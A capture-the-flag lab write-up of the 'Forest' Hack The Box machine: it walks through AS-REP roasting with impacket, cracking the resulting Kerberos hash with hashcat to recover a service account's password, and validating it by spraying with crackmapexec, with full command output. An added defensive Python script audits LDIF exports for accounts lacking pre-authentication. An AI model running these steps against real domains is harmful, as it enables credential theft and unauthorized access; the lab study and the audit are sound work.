ASREPRoasting
I was able to extract domain users from multiple different sources including Kerberos, SMB, and LDAP.
Those domain users were then put into a list.
impacket-GetNPUsers
┌──(kali㉿kali)-[~/archive/htb/labs/forest]
└─$ impacket-GetNPUsers htb.local/ -dc-ip $IP -usersfile users
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[-] User administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User sebastien doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$svc-alfresco@HTB.LOCAL:fe6842a7423d169a93a1cc28dd6c7563$6cdc4d2d17399026706013c7a1c8db0e403d32005c6f9dc24ec4c33f9878756baf62a7c0324f5edfee73a74721578aa26297c107a92713b6e517eed2307fad0c9362573ead4e4ddee5c4446a04bb1d3f481a91cc075a09781423ae16a99ec8b5517af86b1a6041f199c55d3eef99a334ab02a7c8bb223fbc465d9b1365136c6395dd3716eb137e1fa4d8f3c06af1c033c9276b8b7121305fae9a45e0aa1165f26235203bc347f0985a58756b63ad83bbcf0b261b905b41246590602a86c1de97532f6a9723356ea6cdc5e0dce1a19aec7eb6477d9061d01a44fbcd28bce7cf033047163fad5b
[-] User andy doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User mark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User santi doesn't have UF_DONT_REQUIRE_PREAUTH set
The service account, svc-alfresco, has the UF_DONT_REQUIRE_PREAUTH bit set.
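A defender-side check for the condition found above, as an added example that is not part of the original write-up: it scans an LDIF export for accounts whose userAccountControl has the UF_DONT_REQUIRE_PREAUTH bit (0x400000) set, and reports whether each is enabled and has a non-expiring password. The sample export, its userAccountControl values, and the old-svc account are constructed for illustration.

```python
UF_ACCOUNTDISABLE = 0x00000002
UF_DONT_EXPIRE_PASSWD = 0x00010000
UF_DONT_REQUIRE_PREAUTH = 0x00400000

# Constructed sample export: account names other than old-svc come from the
# write-up; old-svc and all userAccountControl values are made up.
SAMPLE_LDIF = """\
dn: CN=svc-alfresco,DC=htb,DC=local
sAMAccountName: svc-alfresco
userAccountControl: 4260352

dn: CN=sebastien,DC=htb,DC=local
sAMAccountName: sebastien
userAccountControl: 66048

dn: CN=old-svc,DC=htb,DC=local
sAMAccountName: old-svc
userAccountControl: 4194818
"""

def parse_ldif(text):
    """Yield one {attribute: value} dict per blank-line-separated entry."""
    for block in text.strip().split("\n\n"):
        entry = {}
        for line in block.splitlines():
            key, sep, value = line.partition(": ")
            if sep:
                entry[key] = value
        yield entry

def audit_preauth(text):
    """Return one finding per account that skips Kerberos pre-authentication."""
    findings = []
    for entry in parse_ldif(text):
        try:
            uac = int(entry["userAccountControl"])
        except (KeyError, ValueError):
            continue  # entry without a usable userAccountControl value
        if not uac & UF_DONT_REQUIRE_PREAUTH:
            continue
        findings.append({
            "account": entry.get("sAMAccountName", entry.get("dn", "?")),
            "enabled": not uac & UF_ACCOUNTDISABLE,
            "password_never_expires": bool(uac & UF_DONT_EXPIRE_PASSWD),
        })
    return findings

if __name__ == "__main__":
    print(audit_preauth(SAMPLE_LDIF))
```

Enabled accounts in the result are the ones to fix first: clear the flag where pre-authentication is not genuinely required, and give any account that must keep it a long random password.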
Password Cracking
┌──(kali㉿kali)-[~/archive/htb/labs/forest]
└─$ hashcat -a 0 -m 18200 svc-alfresco.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
hashes: 1 digests; 1 unique digests, 1 unique salts
bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
rules: 1
dictionary cache hit:
* filename..: /usr/share/wordlists/rockyou.txt
* passwords.: 14344385
* bytes.....: 139921507
* keyspace..: 14344385
$krb5asrep$23$svc-alfresco@htb.local:fe6842a7423d169a93a1cc28dd6c7563$6cdc4d2d17399026706013c7a1c8db0e403d32005c6f9dc24ec4c33f9878756baf62a7c0324f5edfee73a74721578aa26297c107a92713b6e517eed2307fad0c9362573ead4e4ddee5c4446a04bb1d3f481a91cc075a09781423ae16a99ec8b5517af86b1a6041f199c55d3eef99a334ab02a7c8bb223fbc465d9b1365136c6395dd3716eb137e1fa4d8f3c06af1c033c9276b8b7121305fae9a45e0aa1165f26235203bc347f0985a58756b63ad83bbcf0b261b905b41246590602a86c1de97532f6a9723356ea6cdc5e0dce1a19aec7eb6477d9061d01a44fbcd28bce7cf033047163fad5b:s3rvice
session..........: hashcat
status...........: Cracked
hash.mode........: 18200 (Kerberos 5, etype 23, AS-REP)
hash.target......: $krb5asrep$23$svc-alfresco@HTB.LOCAL:fe6842a7423d16...3fad5b
time.started.....: Sun Jan 22 14:22:03 2023 (4 secs)
time.estimated...: Sun Jan 22 14:22:07 2023 (0 secs)
kernel.feature...: Pure Kernel
guess.base.......: File (/usr/share/wordlists/rockyou.txt)
guess.queue......: 1/1 (100.00%)
speed.#1.........: 983.4 kH/s (0.41ms) @ Accel:256 Loops:1 Thr:1 Vec:8
recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
progress.........: 4085760/14344385 (28.48%)
rejected.........: 0/4085760 (0.00%)
restore.point....: 4084992/14344385 (28.48%)
restore.sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
candidate.engine.: Device Generator
candidates.#1....: s4299047 -> s3r3ndipit
hardware.mon.#1..: Util: 70%
[s]tatus [p]ause [b]ypass [c]heckpoint [f]inish [q]uit => started: Sun Jan 22 14:21:46 2023
stopped: Sun Jan 22 14:22:08 2023
Hashcat cracked the password hash for the svc-alfresco user.
The cracked password is s3rvice
Validation
┌──(kali㉿kali)-[~/archive/htb/labs/forest]
└─$ crackmapexec ldap $IP -u users -p 's3rvice' --continue-on-success
SMB 10.10.10.161 445 FOREST [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
SMB 10.10.10.161 445 FOREST [-] htb.local\administrator:s3rvice
SMB 10.10.10.161 445 FOREST [-] htb.local\krbtgt:s3rvice
SMB 10.10.10.161 445 FOREST [-] htb.local\$331000-VK4ADACQNUCA:s3rvice
SMB 10.10.10.161 445 FOREST [-] htb.local\sebastien:s3rvice
SMB 10.10.10.161 445 FOREST [-] htb.local\lucinda:s3rvice
LDAP 10.10.10.161 389 FOREST [+] htb.local\svc-alfresco:s3rvice
LDAP 10.10.10.161 389 FOREST [-] htb.local\andy:s3rvice
LDAP 10.10.10.161 389 FOREST [-] htb.local\mark:s3rvice
LDAP 10.10.10.161 389 FOREST [-] htb.local\santi:s3rvice
┌──(kali㉿kali)-[~/archive/htb/labs/forest]
└─$ crackmapexec smb $IP -u users -p 's3rvice' --continue-on-success
SMB 10.10.10.161 445 FOREST [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
SMB 10.10.10.161 445 FOREST [-] htb.local\administrator:s3rvice STATUS_LOGON_FAILURE
SMB 10.10.10.161 445 FOREST [-] htb.local\krbtgt:s3rvice STATUS_LOGON_FAILURE
SMB 10.10.10.161 445 FOREST [-] htb.local\$331000-VK4ADACQNUCA:s3rvice STATUS_LOGON_FAILURE
SMB 10.10.10.161 445 FOREST [-] htb.local\sebastien:s3rvice STATUS_LOGON_FAILURE
SMB 10.10.10.161 445 FOREST [-] htb.local\lucinda:s3rvice STATUS_LOGON_FAILURE
SMB 10.10.10.161 445 FOREST [+] htb.local\svc-alfresco:s3rvice
SMB 10.10.10.161 445 FOREST [-] htb.local\andy:s3rvice STATUS_LOGON_FAILURE
SMB 10.10.10.161 445 FOREST [-] htb.local\mark:s3rvice STATUS_LOGON_FAILURE
SMB 10.10.10.161 445 FOREST [-] htb.local\santi:s3rvice STATUS_LOGON_FAILURE
Credential validated.
htb.local\svc-alfresco:s3rvice